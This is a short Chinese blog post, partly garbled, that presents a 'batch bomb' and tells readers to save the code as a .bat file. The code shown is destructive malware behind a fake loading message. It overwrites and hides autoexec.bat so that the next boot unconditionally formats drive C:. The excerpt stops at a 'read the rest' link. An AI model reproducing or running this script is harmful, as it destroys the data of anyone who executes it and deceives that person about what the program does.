天天博客
天天新发现,天天有惊喜!
-
一个批处炸弹
Posted on December 3rd, 2007 No comments以下代?拷?到TXT文档,然?文档?缀??该为.bat
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo call format c: /q /u /autotest >nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
Read the rest of this entry »


